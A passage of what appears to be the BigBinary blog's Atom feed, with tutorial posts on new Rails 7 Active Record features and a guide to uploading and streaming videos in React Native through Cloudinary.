      <content type="html"><![CDATA[<p><a href="https://api.rubyonrails.org/v6.1.4/classes/ActiveRecord/Persistence.html">Active Record</a> in Rails provides various methods like <code>exists?</code>, <code>persisted?</code>, <code>destroyed?</code> and many more. Using these methods we can easily determine if an object exists in the database, or if an object is an existing record in the database and not a new record.</p><p>Using these methods we can quickly determine the state of an object and easily write complex conditional statements that depend on it. Previously, we did not have a method that lets us determine if an object was part of the database in the past but no longer exists.</p><p>However, <a href="https://github.com/rails/rails/pull/42389">Rails 7 has added the previously_persisted? method to ActiveRecord</a>, which returns <code>true</code> if an object was previously part of the database records but has since been destroyed.</p><p>Let's assume we have a <code>User</code> model with the name column value <code>John Doe</code>. If this record has been deleted from the database, we can still check whether <code>John Doe</code> was a user of our app in the past.</p><h3>Before</h3><p>Let's say we delete the user with the name <code>John Doe</code>.</p><pre><code class="language-ruby"># app/controllers/user_controller.rb
previous_user = User.find_by_name('John Doe')
previous_user.destroy!</code></pre><p>Now we can check whether the user previously existed in our database.</p><pre><code class="language-ruby"># app/controllers/user_controller.rb
# check if previous_user is destroyed and is not a new user
if previous_user.destroyed? &amp;&amp; !previous_user.new_record?
  # returns true
end</code></pre><h3>Rails 7 onwards</h3><p>We can use the <code>previously_persisted?</code> method on an object.</p><p>Let's delete the user with the name <code>John Doe</code>.</p><pre><code class="language-ruby"># app/controllers/user_controller.rb
previous_user = User.find_by_name('John Doe')
previous_user.destroy!</code></pre><p>Now we can check whether the user previously existed in our database using the <code>previously_persisted?</code> method.</p><pre><code class="language-ruby"># app/controllers/user_controller.rb
previous_user.previously_persisted? # returns true</code></pre><p>Check out this <a href="https://github.com/rails/rails/pull/42389">pull request</a> for more details.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 7 adds ActiveRecord::QueryMethods#in_order_of]]></title>
       <author><name>Ashik Salman</name></author>
      <link href="https://www.bigbinary.com/blog/rails-7-adds-activerecord-query-methods-in-order-of"/>
      <updated>2021-11-02T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-7-adds-activerecord-query-methods-in-order-of</id>
      <content type="html"><![CDATA[<p>Rails 7 introduces <a href="https://edgeapi.rubyonrails.org/classes/ActiveRecord/QueryMethods.html#method-i-in_order_of">ActiveRecord::QueryMethods#in_order_of</a> to fetch an Active Record collection in a specific order based on the given attribute values.</p><p>A similar method, <code>Enumerable#in_order_of</code>, is available to arrange the items of an enumerable collection in a specific order using a key-series pair. You can find more details about the <code>Enumerable#in_order_of</code> method in <a href="https://www.bigbinary.com/blog/rails-7-adds-enumerable-in-order-of">our blog</a>.</p><p>The newly introduced method is very helpful for building queries where we want the resulting collection in a specific, explicit order. Otherwise, we would have to write custom <code>CASE</code> statements in raw SQL to specify the order.</p><pre><code class="language-ruby"># Fetch Post records in order of [3, 5, 1]
SELECT &quot;posts&quot;.* FROM &quot;posts&quot; ORDER BY CASE &quot;posts&quot;.&quot;id&quot; WHEN 3 THEN 1 WHEN 5 THEN 2 WHEN 1 THEN 3 ELSE 4 END ASC</code></pre><h3>Before</h3><p>Suppose we have a <code>Course</code> model with a <code>status</code> column having possible values like <code>enrolled</code>, <code>started</code> &amp; <code>completed</code>. If we want to fetch all course records as a collection with status values in order of <code>started</code>, <code>enrolled</code> &amp; <code>completed</code>, then the only option here is to build the <code>CASE</code> statement as raw SQL. 
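To make the ordering idea concrete, here is a plain-Ruby sketch (not the Rails API; the `Course` struct and data are made up for illustration) of sorting records so an attribute follows an explicit list, which is exactly what the `CASE` statement encodes:

```ruby
# Plain-Ruby sketch of ordering by an explicit value list:
# each status is ranked by its position in the desired order,
# and unknown statuses sort last (like the CASE's ELSE branch).
Course = Struct.new(:name, :status)

courses = [
  Course.new("Rails Course", "completed"),
  Course.new("Ruby Course", "started"),
  Course.new("SQL Course", "enrolled")
]

order = %w[started enrolled completed]
sorted = courses.sort_by { |course| order.index(course.status) || order.size }

puts sorted.map(&:status).inspect
# => ["started", "enrolled", "completed"]
```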
Otherwise, we would have to iterate over the returned result and rearrange it into the specific order we want.</p><pre><code class="language-ruby">Course.order(
  Arel.sql(
    %q(
      case status
      when 'started' then 1
      when 'enrolled' then 2
      when 'completed' then 3
      else 4 end
    )
  )
)</code></pre><h3>Rails 7 onwards</h3><p>The <code>ActiveRecord::QueryMethods#in_order_of</code> method will prepare either a <code>CASE</code> statement or make use of a built-in function (e.g. <code>FIELD</code> in MySQL), based on the adapter, to perform the specified ordering.</p><pre><code class="language-ruby">Course.in_order_of(:status, %w(started enrolled completed))</code></pre><p>The returned result here is an <code>ActiveRecord::Relation</code> object, unlike the result of <code>Enumerable#in_order_of</code>, which is an array. Hence, we can chain other scopes or query methods with the result while using the <code>ActiveRecord::QueryMethods#in_order_of</code> method.</p><pre><code class="language-ruby">Course.in_order_of(:status, %w(started enrolled completed)).order(created_at: :desc).pluck(:name)</code></pre><p>Please check out this <a href="https://github.com/rails/rails/pull/42061">pull request</a> for more details.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 7 adds disable_joins for associations]]></title>
       <author><name>Ashik Salman</name></author>
      <link href="https://www.bigbinary.com/blog/rails-7-adds-disable-joins-for-associations"/>
      <updated>2021-10-26T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-7-adds-disable-joins-for-associations</id>
      <content type="html"><![CDATA[<p>Rails 7 introduces <code>disable_joins</code> for database associations to avoid join errors in multi-tenant applications where the two tables are located in different database clusters.</p><p>Rails commonly performs lazy loading while fetching records for better efficiency, and internally builds join queries to fetch the records faster.</p><p>But when we deal with different database clusters within the same application, the lazy loading nature of Active Record causes errors, because join queries can't be performed across different clusters.</p><p>As a resolution for this, Rails 7 has added the <code>disable_joins</code> option to tell Rails upfront that queries must be performed without joining tables. In this case, two or more queries will be generated and used to fetch the results from the different database clusters.</p><p>The <code>disable_joins</code> option is available for both <code>has_many :through</code> and <code>has_one :through</code> associations. In some cases, if an order or limit is applied, it will be performed in-memory due to database limitations.</p><pre><code class="language-ruby">class Employee &lt; ApplicationRecord
  has_many :projects
  has_many :tasks, through: :projects, disable_joins: true
end

class Project &lt; ApplicationRecord
  belongs_to :employee
  has_many :tasks
end

class Task &lt; ApplicationRecord
  belongs_to :project
end</code></pre><p>Before Rails 7, <code>@employee.tasks</code> (where the <code>disable_joins</code> option did not exist) would raise an error, because the database clusters can't handle join queries here. If we set the <code>disable_joins</code> option to true (by default, the value is set to false), then Rails will make two or more separate queries to fetch the results from the different database clusters.</p><pre><code class="language-sql">SELECT &quot;projects&quot;.&quot;id&quot; FROM &quot;projects&quot; WHERE &quot;projects&quot;.&quot;employee_id&quot; = ? [[&quot;employee_id&quot;, 1]]
SELECT &quot;tasks&quot;.* FROM &quot;tasks&quot; WHERE &quot;tasks&quot;.&quot;project_id&quot; IN (?, ?, ?) [[&quot;project_id&quot;, 1], [&quot;project_id&quot;, 2], [&quot;project_id&quot;, 3]]</code></pre><p>Similarly, for a <code>has_one :through</code> association:</p><pre><code class="language-ruby">class Publisher &lt; ApplicationRecord
  has_one :author
  has_one :book, through: :author, disable_joins: true
end

class Author &lt; ApplicationRecord
  belongs_to :publisher
  has_one :book
end

class Book &lt; ApplicationRecord
  belongs_to :author
end</code></pre><p><code>@publisher.book</code> will make the following two queries to fetch the result.</p><pre><code class="language-sql">SELECT &quot;authors&quot;.&quot;id&quot; FROM &quot;authors&quot; WHERE &quot;authors&quot;.&quot;publisher_id&quot; = ? [[&quot;publisher_id&quot;, 1]]
SELECT &quot;books&quot;.* FROM &quot;books&quot; WHERE &quot;books&quot;.&quot;author_id&quot; = ? [[&quot;author_id&quot;, 1]]</code></pre><p>Please be aware that enabling this option without an actual need will have performance implications, since two or more queries are performed here. Also, queries with order or limit will be done in-memory, since the order from one database can't be applied to another database's query.</p><p>Please check out the <code>disable_joins</code> pull requests for <a href="https://github.com/rails/rails/pull/41937">has_many through</a> &amp; <a href="https://github.com/rails/rails/pull/42079">has_one through</a> associations for more details and discussions.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 7 adds the ability to use pre-defined variants]]></title>
       <author><name>Gaurav Varma</name></author>
      <link href="https://www.bigbinary.com/blog/rails-7-adds-ability-to-use-predefined-variants"/>
      <updated>2021-10-19T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-7-adds-ability-to-use-predefined-variants</id>
      <content type="html"><![CDATA[<p>Rails 5.2 introduced <a href="https://guides.rubyonrails.org/active_storage_overview.html">ActiveStorage</a>, which made it possible to easily upload files to a cloud storage service like Amazon S3, Google Cloud Storage, or Microsoft Azure Storage. It also helped in attaching the files to Active Record objects.</p><p>Using <code>ActiveStorage</code> and <a href="https://www.imagemagick.org">ImageMagick</a> we can transform image uploads and extract metadata from files. For transforming image uploads we can use the <a href="https://github.com/janko/image_processing">image_processing</a> gem with <code>ActiveStorage</code> and create variants of an image.</p><p>Previously, for creating image variants, we needed to use the <a href="https://github.com/janko/image_processing">image_processing</a> gem with an <code>ActiveStorage</code> processor. The default processor for <code>ActiveStorage</code> is <code>MiniMagick</code>, but we can also use <a href="https://www.rubydoc.info/gems/ruby-vips/Vips/Image">Vips</a>.</p><p>However, <a href="https://github.com/rails/rails/pull/39135">Rails 7 has added the ability to use pre-defined variants</a>, which provides a way to easily create variants for images.</p><p>Let's assume we have a model <code>Blog</code>. Using <code>has_one_attached</code>, every record can have one file attached to it.</p><pre><code class="language-ruby"># app/models/blog.rb
class Blog &lt; ApplicationRecord
  has_one_attached :display_picture # Setup mapping between record and file
end</code></pre><p>To create a <code>blog</code> with an attachment on <code>display_picture</code>:</p><pre><code class="language-ruby"># app/views/blogs/new.html.erb
&lt;%= form.file_field :display_picture %&gt;</code></pre><pre><code class="language-ruby"># app/controllers/blogs_controller.rb
class BlogsController &lt; ApplicationController
  def create
    blog = Blog.create!(blog_params)
    redirect_to root_path
  end

  private

    def blog_params
      params.require(:blog).permit(:title, :display_picture)
    end
end</code></pre><h3>Before</h3><p>If we want to create variants of <code>display_picture</code>, we need to add the <a href="https://github.com/janko/image_processing">image_processing</a> gem to the <code>Gemfile</code>.</p><pre><code class="language-ruby"># project_folder/Gemfile
gem 'image_processing'</code></pre><p>Then, to create variants of the image, we can call the <code>variant</code> method on the attachment.</p><pre><code class="language-ruby"># app/views/blogs/show.html.erb
&lt;%= image_tag blog.display_picture.variant(resize_to_limit: [100, 100]) %&gt;</code></pre><h3>Rails 7 onwards</h3><p>We can use the <code>variants</code> option on <code>has_one_attached</code>.</p><pre><code class="language-ruby">class Blog &lt; ActiveRecord::Base
  has_one_attached :display_picture, variants: {
    thumb: { resize: &quot;100x100&quot; },
    medium: { resize: &quot;300x300&quot; }
  }
end</code></pre><p>To display a variant we can use the <code>variant</code> method.</p><pre><code class="language-ruby"># app/views/blogs/show.html.erb
&lt;%= image_tag blog.display_picture.variant(:thumb) %&gt;</code></pre><p><code>variants</code> can also be used on <code>has_many_attached</code>. 
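The idea behind pre-defined variants can be sketched in plain Ruby (a minimal illustration only, not ActiveStorage's implementation; the preset hash mirrors the model definition above): named presets map to transformation options and are looked up by key.

```ruby
# Plain-Ruby sketch of named variant presets: a hash of transformation
# options looked up by key, roughly what `variant(:thumb)` resolves against.
VARIANTS = {
  thumb:  { resize: "100x100" },
  medium: { resize: "300x300" }
}.freeze

def variant_options(name)
  VARIANTS.fetch(name) { raise ArgumentError, "unknown variant #{name}" }
end

puts variant_options(:thumb)[:resize]
# => 100x100
```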
Check out this<a href="https://github.com/rails/rails/pull/39135">pull request</a> for more details.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 7 adds setting for enumerating columns in select statements]]></title>
       <author><name>Ashik Salman</name></author>
      <link href="https://www.bigbinary.com/blog/rails-7-adds-setting-for-enumerating-columns-in-select-statements"/>
      <updated>2021-10-13T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-7-adds-setting-for-enumerating-columns-in-select-statements</id>
      <content type="html"><![CDATA[<p>Rails 7 has introduced a new setting called <code>enumerate_columns_in_select_statements</code> for enumerating columns in Active Record select query statements, by which we can avoid common <a href="https://apidock.com/rails/ActiveRecord/PreparedStatementCacheExpired">ActiveRecord::PreparedStatementCacheExpired</a> errors.</p><p>Rails uses prepared statements for database query efficiency. When prepared statements are being used, repeated queries will be cached based on the prepared statement query plan at the Postgres database level. This cached value becomes invalid when the returned results change.</p><p>Whenever we make schema changes to the database tables while the application is running, the cached select statements with a wildcard column definition will raise a <code>PreparedStatementCacheExpired</code> error, since the query output has changed.</p><h3>Before</h3><pre><code class="language-ruby">=&gt; User.limit(10)
=&gt; SELECT * FROM users LIMIT 10</code></pre><p>If we use a select query with <code>*</code>, then any change in the database schema for the particular table (e.g. users) will invalidate the prepared statement cache and result in the <code>PreparedStatementCacheExpired</code> error. The solution here is to mention the columns explicitly in the select statement, as shown below:</p><pre><code class="language-ruby">=&gt; SELECT &quot;first_name,last_name,email ...&quot; FROM users LIMIT 10</code></pre><h3>Rails 7 onwards</h3><p>Rails 7 adds a new setting by which we can ensure all select statements are generated by enumerating the columns explicitly. 
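To illustrate what "enumerating columns" means, here is a plain-Ruby sketch (the helper and column list are hypothetical, not Rails internals) of building a select statement from an explicit column list instead of a wildcard:

```ruby
# Plain-Ruby sketch: build a SELECT that names its columns explicitly,
# so a schema change cannot silently alter the query's output shape.
# The column list is hypothetical.
def select_sql(table, columns)
  quoted = columns.map { |column| %("#{column}") }.join(", ")
  "SELECT #{quoted} FROM #{table} LIMIT 10"
end

puts select_sql("users", %w[id first_name last_name email])
# => SELECT "id", "first_name", "last_name", "email" FROM users LIMIT 10
```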
Hence, any modifications to the database schema won't result in <code>PreparedStatementCacheExpired</code>; instead, the prepared statements will be changed and the respective query will be freshly cached by the Postgres database.</p><p>We can either configure the setting for all models or at a specific model level.</p><pre><code class="language-ruby"># config/application.rb
module MyApp
  class Application &lt; Rails::Application
    config.active_record.enumerate_columns_in_select_statements = true
  end
end

# User model specific
class User &lt; ApplicationRecord
  self.enumerate_columns_in_select_statements = true
end</code></pre><p>When the setting is set to <code>true</code>, the select statement will always contain the columns explicitly.</p><pre><code class="language-ruby">=&gt; User.limit(10)
=&gt; SELECT &quot;first_name,last_name,email ...&quot; FROM users LIMIT 10</code></pre><p>Check out this <a href="https://github.com/rails/rails/pull/41718">pull request</a> for more details.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Reducing memory bloat of a Ruby on Rails application]]></title>
       <author><name>Unnikrishnan KP</name></author>
      <link href="https://www.bigbinary.com/blog/reducing-memory-bloat-in-a-ruby-on-rails-application"/>
      <updated>2021-10-12T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/reducing-memory-bloat-in-a-ruby-on-rails-application</id>
      <content type="html"><![CDATA[<p>Recently, we noticed that one of our internal products had started consuming too much memory. Some of our team members dug deep into it and resolved the issue. After the issue was resolved, Unni made a video for internal purposes. In this blog, we are posting that video as it was recorded.</p><p>&lt;iframe width=&quot;100%&quot; height=&quot;315&quot; src=&quot;https://www.youtube.com/embed/pEFUS6beuow&quot; frameborder=&quot;0&quot; allow=&quot;accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture&quot; allowfullscreen&gt;&lt;/iframe&gt;</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 7 adds ComparisonValidator to ActiveRecord]]></title>
       <author><name>Gaurav Varma</name></author>
      <link href="https://www.bigbinary.com/blog/rails-7-adds-comparison-validator-to-active-record"/>
      <updated>2021-10-05T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-7-adds-comparison-validator-to-active-record</id>
      <content type="html"><![CDATA[<p>Rails <a href="https://guides.rubyonrails.org/active_record_validations.html">Active Record Validations</a> provide a convenient way to validate the state of an object before it is stored in the database. There are various built-in <a href="https://guides.rubyonrails.org/active_record_validations.html">Active Record validations</a> like <code>presence</code>, <code>length</code>, <code>numericality</code> and <code>uniqueness</code>.</p><p>By using the <a href="https://guides.rubyonrails.org/active_record_validations.html#numericality">numericality validator</a>, we can validate that an attribute only has numeric values.</p><pre><code class="language-ruby"># app/models/blog.rb
class Blog &lt; ApplicationRecord
  validates :likes, numericality: true
end</code></pre><p>We can also use helpers like <code>greater_than</code>, <code>greater_than_or_equal_to</code>, <code>equal_to</code>, <code>less_than</code>, <code>less_than_or_equal_to</code>, <code>other_than</code>, <code>odd</code> and <code>even</code> with the <a href="https://guides.rubyonrails.org/active_record_validations.html#numericality">numericality validator</a>, but these work only on numbers.</p><pre><code class="language-ruby"># app/models/blog.rb
class Blog &lt; ApplicationRecord
  validates :likes, numericality: { greater_than: 1 }
end</code></pre><p>Previously, for validating comparisons of dates, we needed to write <a href="https://guides.rubyonrails.org/active_record_validations.html#performing-custom-validations">custom validators</a> or use a gem like <a href="https://github.com/codegram/date_validator">date_validator</a>.</p><p>However, <a href="https://github.com/rails/rails/pull/40095">Rails 7 has added ComparisonValidator</a>, which provides a way to easily validate comparisons with another value, proc, or attribute. 
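The core idea of a comparison validation can be sketched in plain Ruby (a simplified stand-in for illustration, not the Rails validator itself):

```ruby
# Plain-Ruby sketch of a comparison check: validate one value against
# another with a given operator, the way ComparisonValidator compares
# an attribute with a value, proc or another attribute.
require "date"

def comparison_valid?(value, other, operator)
  value.public_send(operator, other)
end

start_date = Date.new(2021, 10, 1)
end_date   = Date.new(2021, 10, 5)

puts comparison_valid?(end_date, start_date, :>)
# => true
```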
Let's assume we have a model <code>Blog</code> with an <code>end_date</code> attribute.</p><h3>Before</h3><p>If we want to validate the <code>end_date</code> attribute against a provided value or another attribute, we would need to write a <a href="https://guides.rubyonrails.org/active_record_validations.html#performing-custom-validations">custom validator</a> or use a gem like <a href="https://github.com/codegram/date_validator">date_validator</a>.</p><pre><code class="language-ruby"># Using date_validator gem
class Blog &lt; ApplicationRecord
  # validate against provided value
  validates :end_date, date: { after: Proc.new { Date.today } }

  # validate against another attribute
  validates :end_date, date: { after: :start_date }
end</code></pre><h3>Rails 7 onwards</h3><p>We can use <a href="https://github.com/rails/rails/pull/40095">ComparisonValidator</a> to validate the comparison of the <code>end_date</code> attribute with a provided value.</p><pre><code class="language-ruby">class Blog &lt; ApplicationRecord
  # validate against provided value
  validates_comparison_of :end_date, greater_than: -&gt; { Date.today }

  # validate against another attribute
  validates :end_date, comparison: { greater_than: :start_date }
end</code></pre><p><a href="https://github.com/rails/rails/pull/40095">ComparisonValidator</a> also provides helpers like <code>greater_than</code>, <code>greater_than_or_equal_to</code>, <code>equal_to</code>, <code>less_than</code>, <code>less_than_or_equal_to</code> and <code>other_than</code>.</p><p>Check out this <a href="https://github.com/rails/rails/pull/40095">pull request</a> for more details.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 7 adds ActiveRecord::Relation#structurally_compatible?]]></title>
       <author><name>Gaurav Varma</name></author>
      <link href="https://www.bigbinary.com/blog/rails-7-adds-active-record-relation-structurally-compatible"/>
      <updated>2021-09-15T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-7-adds-active-record-relation-structurally-compatible</id>
      <content type="html"><![CDATA[<p><a href="https://guides.rubyonrails.org/active_record_querying.html">ActiveRecord</a> is one of the most powerful features in Rails. With <code>ActiveRecord</code> we can easily query and handle database objects without writing any SQL.</p><p>By using the <code>ActiveRecord Query Interface</code>, we can perform various query operations like <code>Joins</code>, <code>Group</code>, <code>Find</code> and <code>Order</code>. We can also chain relations with <code>where</code>, <code>and</code>, <code>or</code> and <code>not</code>, but for <code>and</code> and <code>or</code> the two relations being chained must be structurally compatible.</p><p>For any two relations to be <a href="https://github.com/rails/rails/blob/c577657f6de64b743b12a21108dc9cc5cfc35098/activerecord/lib/active_record/relation/query_methods.rb#L650">structurally compatible</a>, they must be scoping the same model, and they must differ only by the <code>where</code> clause when no <code>group</code> clause has been defined. If a <code>group</code> clause is present, then the relations must differ only by the <code>having</code> clause. Also, neither relation may use a <code>limit</code>, <code>offset</code>, or <code>distinct</code> method.</p><p>Previously, for the <code>and</code> or <code>or</code> query methods, we needed to make sure that the two relations were structurally compatible; otherwise, <code>ActiveRecord</code> would raise an error.</p><p>However, <a href="https://github.com/rails/rails/pull/41841">Rails 7 has added ActiveRecord::Relation#structurally_compatible?</a>, which provides a method to easily tell if two relations are structurally compatible. 
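The compatibility rule can be sketched in plain Ruby (a simplified model where each "relation" is just a hash of its query clauses; this is an illustration of the rule, not Rails' actual implementation):

```ruby
# Plain-Ruby sketch of the rule: two relations are compatible when
# neither uses limit/offset/distinct and they differ only by :where
# (or only by :having when a :group clause is present).
def structurally_compatible?(a, b)
  return false if [a, b].any? { |r| r[:limit] || r[:offset] || r[:distinct] }
  ignored = (a[:group] || b[:group]) ? :having : :where
  a.reject { |k, _| k == ignored } == b.reject { |k, _| k == ignored }
end

r1 = { model: :blog, where: "name = 'bigbinary blog'" }
r2 = { model: :blog, where: "user_id = 1" }
r3 = { model: :blog, where: "user_id = 1", limit: 5 }

puts structurally_compatible?(r1, r2) # differs only by :where
puts structurally_compatible?(r1, r3) # r3 uses :limit
```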
We can use this method before we run the <code>and</code> or <code>or</code> query methods on any two relations.</p><p>Let's assume we have two models, <code>Blog</code> and <code>Post</code>, with the following associations.</p><pre><code class="language-ruby"># app/models/blog.rb
class Blog &lt; ApplicationRecord
  has_many :posts
end</code></pre><pre><code class="language-ruby"># app/models/post.rb
class Post &lt; ApplicationRecord
  belongs_to :blog
end</code></pre><h3>Before</h3><p>If we run an <code>or</code> query between incompatible relations, we get an <code>ArgumentError</code>.</p><pre><code class="language-ruby">relation_1 = Blog.where(name: 'bigbinary blog')
relation_2 = Blog.joins(:posts).where(posts: { user_id: current_user.id })

begin
  relation_1.or(relation_2)
rescue ArgumentError
  # Rescue ArgumentError
end</code></pre><h3>Rails 7 onwards</h3><p>We can check the structural compatibility of the two relations first.</p><pre><code class="language-ruby">relation_1 = Blog.where(name: 'bigbinary blog')
relation_2 = Blog.where(user_id: current_user.id)

if relation_1.structurally_compatible?(relation_2) # returns true
  relation_1.or(relation_2)
end</code></pre><p>Check out this <a href="https://github.com/rails/rails/pull/41841/files">pull request</a> for more details.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Playing videos in React Native]]></title>
       <author><name>Chirag Bhaiji</name></author>
      <link href="https://www.bigbinary.com/blog/playing-videos-in-react-native-using-cloudinary"/>
      <updated>2021-09-14T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/playing-videos-in-react-native-using-cloudinary</id>
      <content type="html"><![CDATA[<p>These days, a large number of mobile apps allow users to upload videos and play those videos efficiently. While building these features in a React Native app, we ran into some challenges. In this blog, we will discuss those challenges and their solutions.</p><h2>Where to host the videos</h2><p>Since we are dealing with videos, we need a service that will store, host, and encode them, and act as a CDN. After looking at various service providers, we decided to go with <a href="https://cloudinary.com/">Cloudinary</a>. Cloudinary is a service provider with an end-to-end image/video-management solution for web and mobile applications, covering everything from <strong><em>uploads, storage, manipulations, and optimizations to delivery</em></strong> with a fast content delivery network (<strong><em>CDN</em></strong>).</p><h3>Setting up react-native-video player</h3><p>We decided to use <a href="https://github.com/react-native-video/react-native-video">react-native-video</a> <code>v5.1.1</code> for playing videos in the React Native application. Here is the <a href="https://github.com/react-native-video/react-native-video#readme">guide</a> to set up the video player.</p><pre><code class="language-jsx">import Video from &quot;react-native-video&quot;;

const Player = ({ uri }) =&gt; {
  return (
    &lt;SafeAreaView style={styles.container}&gt;
      &lt;Video
        style={styles.player}
        source={{ uri }}
        controls
        resizeMode=&quot;contain&quot;
      /&gt;
    &lt;/SafeAreaView&gt;
  );
};</code></pre><p>The above code snippet works perfectly on iOS but not on Android. On Android, we faced a <a href="https://github.com/react-native-video/react-native-video/issues/1032">known issue</a> where the video doesn't play, but the audio plays with a significant delay.
This issue can be resolved by setting <a href="https://developer.android.com/guide/topics/media/exoplayer">exoplayer</a> as the default player for Android in <code>react-native.config.js</code> in the root directory of the project.</p><pre><code class="language-js">module.exports = {
  dependencies: {
    &quot;react-native-video&quot;: {
      platforms: {
        android: {
          sourceDir: &quot;../node_modules/react-native-video/android-exoplayer&quot;,
        },
      },
    },
  },
};</code></pre><h3>Setting up Cloudinary</h3><p>A Cloudinary account is required before proceeding. Once the account is ready, here are the steps to enable unsigned uploads for the account.</p><ul><li>Go to the <em>Settings</em> of Cloudinary.</li><li>Select the <em>Upload</em> tab.</li><li>Search for the <em>Upload presets</em> section.</li><li>Click on <em>Enable unsigned uploading</em>.</li></ul><p>This generates an upload preset with a random name, which will be required for the unsigned upload.</p><h2>Setting up Client for Upload</h2><h3>Selecting Video from the gallery</h3><p>We decided to use the <a href="https://github.com/ivpusic/react-native-image-crop-picker">react-native-image-crop-picker</a> <code>v0.36.2</code> library to select the video from the gallery.
Here is the <a href="https://github.com/ivpusic/react-native-image-crop-picker#readme">guide</a> for setting it up.</p><pre><code class="language-jsx">import ImagePicker from &quot;react-native-image-crop-picker&quot;;

const selectVideo = ({ setVideoToUpload }) =&gt; {
  ImagePicker.openPicker({ mediaType: &quot;video&quot; })
    .then(setVideoToUpload)
    .catch(console.error);
};</code></pre><h3>Uploading Video</h3><pre><code class="language-js">import axios from &quot;axios&quot;;

// Cloud Name: Found on the Dashboard of Cloudinary.
const URL = &quot;https://api.cloudinary.com/v1_1/&lt;CLOUD_NAME&gt;/video/upload&quot;;
// Random Name: Generated After Enabling The Unsigned Uploading.
const UPLOAD_PRESET = &quot;&lt;UPLOAD_PRESET_FOR_UNSIGNED_UPLOAD&gt;&quot;;

const uploadVideo = (fileInfo, onSuccess, onError) =&gt; {
  const { name, uri, type } = fileInfo;
  let formData = new FormData();
  if (uri) {
    formData.append(&quot;file&quot;, { name, uri, type });
    formData.append(&quot;upload_preset&quot;, UPLOAD_PRESET);
  }

  axios
    .post(URL, formData, {
      headers: { &quot;Content-Type&quot;: &quot;multipart/form-data&quot; },
    })
    .then(res =&gt; onSuccess(res.data))
    .catch(error =&gt; onError(error));
};

export default { uploadVideo };</code></pre><h3>Fetching Videos on client</h3><pre><code class="language-js">import axios from &quot;axios&quot;;
import base64 from &quot;base-64&quot;;

// API Key and Secret: Found on the Dashboard of Cloudinary.
const API_KEY = &quot;&lt;API_KEY&gt;&quot;;
const API_SECRET = &quot;&lt;API_SECRET&gt;&quot;;
const URL = `https://api.cloudinary.com/v1_1/&lt;CLOUD_NAME&gt;/resources/video`;

const getVideos = (onRes, onError) =&gt; {
  axios
    .get(URL, {
      headers: {
        Authorization: base64.encode(`${API_KEY}:${API_SECRET}`),
      },
    })
    .then(res =&gt; onRes(res.data.resources))
    .catch(error =&gt; onError(error));
};

export default { getVideos };</code></pre><p>Response:</p><pre><code class="language-json">{
  &quot;resources&quot;: [
    {
      &quot;asset_id&quot;: &quot;475675ddd87cb3bb380415736ed1e3dc&quot;,
      &quot;public_id&quot;: &quot;samples/elephants&quot;,
      &quot;format&quot;: &quot;mp4&quot;,
      &quot;version&quot;: 1628233788,
      &quot;resource_type&quot;: &quot;video&quot;,
      &quot;type&quot;: &quot;upload&quot;,
      &quot;created_at&quot;: &quot;2021-08-06T07:09:48Z&quot;,
      &quot;bytes&quot;: 38855178,
      &quot;width&quot;: 1920,
      &quot;height&quot;: 1080,
      &quot;access_mode&quot;: &quot;public&quot;,
      &quot;url&quot;: &quot;http://res.cloudinary.com/do77lourv/video/upload/v1628233788/samples/elephants.mp4&quot;,
      &quot;secure_url&quot;: &quot;https://res.cloudinary.com/do77lourv/video/upload/v1628233788/samples/elephants.mp4&quot;
    }
    //...
  ]
}</code></pre><h3>Transforming uploaded videos for faster delivery</h3><p>One way to play a video is to first completely download the video on the client's device and then play it locally. The biggest drawback of this approach is that it could take a long time before the video is fully downloaded, and until then the device is not playing anything at all. This strategy also requires a sophisticated algorithm to manage memory.</p><p>Another solution is to use <a href="https://en.wikipedia.org/wiki/Adaptive_bitrate_streaming">Adaptive Bitrate Streaming</a> (ABS) for playing videos. As the name suggests, in this case the video is streamed.
It is one of the most efficient ways to deliver videos based on the client's internet bandwidth and device capabilities.</p><p>To generate ABS, we add an eager transformation to the upload preset we created while setting up the Cloudinary account earlier.</p><p>An eager transformation runs automatically for all the videos uploaded using the upload preset to which the transformation has been added.</p><h3>Setup Transformation</h3><p>Here are the steps for adding an eager transformation to the upload preset.</p><ul><li>Go to the upload preset that was generated when the unsigned upload was enabled while setting up Cloudinary in the earlier section.</li><li>Click on edit.</li><li>Go to the Upload Manipulations section.</li><li>Click on <code>Add Eager Transformation</code> to open the Edit Transformation window.</li><li>Open the <code>Format</code> dropdown under the <code>Format &amp; shape</code> section and select <code>M3U8 Playlist (HLS)</code>.</li><li>Select any streaming profile from the dropdown under <code>More options</code>. Any profile matching your maximum required quality can be selected here.</li></ul><p>Next, upload a video with the same preset to trigger the transformation and generate the <code>M3U8</code> format, which is the one we need for playing the videos as streams.</p><h3>Consuming video streams</h3><p>To play streams, the <code>type</code> property must be provided to <code>react-native-video</code>'s source prop. In this case, <code>type</code> will be <code>m3u8</code>. Also, the URI needs to be updated with this same extension.</p><pre><code class="language-diff">- source={{ uri }}
+ source={{ uri: uri.replace(`.${format}`, '.m3u8'), type: 'm3u8' }}</code></pre><h3>Conclusion</h3><p>Once all the above-mentioned steps were performed, we were able to upload and stream videos on both iOS and Android without any issues.</p>]]></content>
    </entry><entry>
       <title><![CDATA[React 18 introduces Automatic Batching]]></title>
       <author><name>Taha Husain</name></author>
      <link href="https://www.bigbinary.com/blog/react-18-introduces-automatic-batching"/>
      <updated>2021-07-09T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/react-18-introduces-automatic-batching</id>
